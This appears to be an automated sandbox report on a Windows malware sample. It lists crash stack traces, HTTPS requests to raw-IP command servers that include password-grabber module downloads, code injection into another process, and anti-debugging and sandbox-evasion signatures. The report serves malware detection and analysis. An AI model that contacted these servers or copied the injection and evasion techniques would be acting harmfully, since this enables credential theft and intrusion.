RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
hook_in_monitor+0x45 lde-0x133 @ 0x744142ea
New_ntdll_NtAllocateVirtualMemory+0x34 New_ntdll_NtClose-0x162 @ 0x7442fc86
VirtualAllocExNuma+0x66 VirtualAllocEx-0x2a kernelbase+0x33096 @ 0x7fefd703096
VirtualAllocEx+0x16 WriteProcessMemory-0x1a kernelbase+0x330d6 @ 0x7fefd7030d6
VirtualAllocEx+0x11 VerLanguageNameW-0xf kernel32+0x4bbe1 @ 0x76e8bbe1
0x9333c

exception.instruction_r: 48 8b 01 4a 89 44 c6 78 4d 85 e4 74 08 4b 89 8c
exception.symbol: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a
exception.instruction: mov rax, qword ptr [rcx]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 105050
exception.address: 0x771d9a5a
registers.r14: 854142240
registers.r15: 854147360
registers.rcx: 27
registers.rsi: 3
registers.r10: 0
registers.rbx: 2
registers.rsp: 2151496
registers.r11: -125
registers.r8: 3
registers.r9: 1951132416
registers.rdx: 3
registers.r12: 40
registers.rbp: 3
registers.rdi: 2151888
registers.rax: 4
registers.r13: 0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (14 events)

suspicious_features	Connection to IP address	suspicious_request	GET https://181.129.167.82/rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/5/file/
suspicious_features	Connection to IP address	suspicious_request	GET https://181.129.167.82/rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/ZhP7RHTDpJf3xpRdHfhTN/
suspicious_features	Connection to IP address	suspicious_request	GET https://181.129.167.82/rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/
suspicious_features	Connection to IP address	suspicious_request	GET https://181.129.167.82/rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/14/user/test22/0/
suspicious_features	Connection to IP address	suspicious_request	GET https://181.129.167.82/rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/14/path/C:%5CUsers%5Ctest22%5CAppData%5CRoaming%5CiLogicMonitorUB2IF8%5Cgxinlinelots.pngxp.our/0/
suspicious_features	Connection to IP address	suspicious_request	GET https://181.129.167.82/rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/14/NAT%20status/client%20is%20behind%20NAT/0/
suspicious_features	Connection to IP address	suspicious_request	GET https://43.252.158.104/rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/5/pwgrabb64/
suspicious_features	Connection to IP address	suspicious_request	GET https://128.201.76.252/rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/5/file/
suspicious_features	Connection to IP address	suspicious_request	GET https://128.201.76.252/rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/cN8siDphAP0SDyFMo/
suspicious_features	Connection to IP address	suspicious_request	GET https://128.201.76.252/rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/
suspicious_features	Connection to IP address	suspicious_request	GET https://128.201.76.252/rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/14/user/test22/0/
suspicious_features	Connection to IP address	suspicious_request	GET https://128.201.76.252/rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/14/NAT%20status/client%20is%20behind%20NAT/0/
suspicious_features	Connection to IP address	suspicious_request	GET https://128.201.76.252/rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/10/62/TJJNLPBFNNBTXBZBFLF/7/
suspicious_features	Connection to IP address	suspicious_request	GET https://105.27.205.34/rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/5/pwgrabc64/

Performs some HTTP requests (15 events)

request	GET https://181.129.167.82/rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/5/file/
request	GET https://ident.me/
request	GET https://181.129.167.82/rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/ZhP7RHTDpJf3xpRdHfhTN/
request	GET https://181.129.167.82/rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/
request	GET https://181.129.167.82/rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/14/user/test22/0/
request	GET https://181.129.167.82/rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/14/path/C:%5CUsers%5Ctest22%5CAppData%5CRoaming%5CiLogicMonitorUB2IF8%5Cgxinlinelots.pngxp.our/0/
request	GET https://181.129.167.82/rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/14/NAT%20status/client%20is%20behind%20NAT/0/
request	GET https://43.252.158.104/rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/5/pwgrabb64/
request	GET https://128.201.76.252/rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/5/file/
request	GET https://128.201.76.252/rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/cN8siDphAP0SDyFMo/
request	GET https://128.201.76.252/rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/
request	GET https://128.201.76.252/rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/14/user/test22/0/
request	GET https://128.201.76.252/rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/14/NAT%20status/client%20is%20behind%20NAT/0/
request	GET https://128.201.76.252/rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/10/62/TJJNLPBFNNBTXBZBFLF/7/
request	GET https://105.27.205.34/rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/5/pwgrabc64/

Allocates read-write-execute memory (usually to unpack itself) (19 events)

Time & API	Arguments	Status	Return
NtProtectVirtualMemory Sept. 23, 2021, 5:15 p.m.	process_identifier: 2972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x10022000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Sept. 23, 2021, 5:15 p.m.	process_identifier: 2972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73d21000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Sept. 23, 2021, 5:15 p.m.	process_identifier: 2972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73cb0000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Sept. 23, 2021, 5:15 p.m.	process_identifier: 2972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73701000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Sept. 23, 2021, 5:15 p.m.	process_identifier: 2972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72b94000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Sept. 23, 2021, 5:15 p.m.	process_identifier: 2972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73702000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Sept. 23, 2021, 5:15 p.m.	process_identifier: 2972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73c81000 process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 23, 2021, 5:15 p.m.	process_identifier: 2972 region_size: 233472 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005a0000 allocation_type: 12289 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Sept. 23, 2021, 5:15 p.m.	process_identifier: 2972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73c61000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Sept. 23, 2021, 5:15 p.m.	process_identifier: 2972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x737c1000 process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 23, 2021, 5:15 p.m.	process_identifier: 2972 region_size: 278528 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02190000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 23, 2021, 5:15 p.m.	process_identifier: 2972 region_size: 12288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00410000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 23, 2021, 5:15 p.m.	process_identifier: 2972 region_size: 12288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x10000000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff		3221225496
NtAllocateVirtualMemory Sept. 23, 2021, 5:15 p.m.	process_identifier: 2972 region_size: 12288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005e0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 23, 2021, 5:15 p.m.	process_identifier: 2972 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005e1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 23, 2021, 5:15 p.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005f0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 23, 2021, 5:15 p.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00600000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 23, 2021, 5:15 p.m.	process_identifier: 2972 region_size: 163840 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00620000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 23, 2021, 5:15 p.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000001bc0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1	0

A process attempted to delay the analysis task. (1 event)

description

wermgr.exe tried to sleep 129 seconds, actually delayed analysis time by 129 seconds

Creates a suspicious process (2 events)

cmdline	C:\Windows\system32\cmd.exe
cmdline	C:\Windows\system32\svchost.exe

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Sept. 23, 2021, 5:15 p.m.	process_identifier: 2972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8192 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x01fd1000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Sept. 23, 2021, 5:15 p.m.	flags: 15 family: 0		111	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x0004d000', u'virtual_address': u'0x00031000', u'entropy': 7.476545474684459, u'name': u'.rsrc', u'virtual_size': u'0x0004cde0'}

entropy

7.47654547468

description

A section with a high entropy has been found

entropy

0.596899224806

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Sept. 23, 2021, 5:15 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Terminates another process (4 events)

Time & API	Arguments	Status
NtTerminateProcess Sept. 23, 2021, 5:15 p.m.	status_code: 0x00000000 process_identifier: 2076 process_handle: 0x00000108
NtTerminateProcess Sept. 23, 2021, 5:15 p.m.	status_code: 0x00000000 process_identifier: 2076 process_handle: 0x00000108	1
NtTerminateProcess Sept. 23, 2021, 5:17 p.m.	status_code: 0x00000000 process_identifier: 2932 process_handle: 0x0000000000000410
NtTerminateProcess Sept. 23, 2021, 5:17 p.m.	status_code: 0x00000000 process_identifier: 2932 process_handle: 0x0000000000000410	1

Communicates with host for which no DNS query was performed (7 events)

host	105.27.205.34
host	128.201.76.252
host	181.129.167.82
host	185.56.175.122
host	221.147.172.5
host	43.252.158.104
host	60.51.47.65

Allocates execute permission to another process indicative of possible code injection (50 out of 267 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000090000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000000a0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 790528 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000180000000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000260000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000270000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000260000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000270000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000260000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000270000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000260000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000270000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000260000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000270000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000260000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000270000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000260000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000270000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000260000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000270000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000260000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000270000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000260000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000270000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000260000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000270000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000260000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000270000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000260000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000270000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
